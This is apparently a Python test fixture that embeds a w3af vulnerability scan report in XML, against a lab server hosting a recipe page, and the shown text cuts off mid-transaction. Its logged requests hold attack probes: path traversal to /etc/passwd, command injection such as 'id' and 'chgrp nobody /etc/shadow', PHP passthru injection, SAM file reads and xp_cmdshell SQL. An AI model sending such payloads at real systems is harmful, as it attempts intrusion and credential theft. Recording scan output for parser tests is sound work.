# -*- coding: UTF-8 -*-
report_medium = r"""<w3af-run start="1432116598" start-long="Wed May 20 12:09:58 2015" version="2.1">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.49
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scan-info target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="template" value="w3af/plugins/output/html_file/templates/complete.html"/>
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scan-info>
    <vulnerability id="[132, 18, 38, 170, 49, 58, 60, 61, 63, 67, 68, 70, 71, 73, 76, 77, 206, 205, 208, 209, 210, 213, 215, 216, 218, 101, 102, 107, 204, 127]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 18 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/admin-console/
 - http://10.12.68.43:31337/web-console/ServerInfo.jsp
 - http://10.12.68.43:31337/status
 - http://10.12.68.43:31337/hzaBe
 - http://10.12.68.43:31337/10.tgz
 - http://10.12.68.43:31337/
 - http://10.12.68.43:31337/10.cab
 - http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll
 - http://10.12.68.43:31337/invoker/JMXInvokerServlet
 - http://10.12.68.43:31337/WebConsole/Invoker
</description>
        <http-transactions>
            <http-transaction id="132">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3VscGptLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubWpwbHU=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="38">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=PsoUz7K HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="170">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="49">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/hzaBe HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">MTgVQi</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about hzaBe has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='hzaBe'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="58">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="60">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="61">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=id&amp;uname%20-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="63">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=%3C%3F%20passthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="67">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%20c%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="68">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=type%20c%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="70">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=ps%20-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="71">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=..%2F..%2F..%2F..%2Fbin%2Fchgrp%20nobody%20%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="73">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=SELECT%20TOP%201%20name%20FROM%20sysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="76">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=exec%20master..xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="77">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?A9WU5q5=exec%20xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="210">
                <http-request>
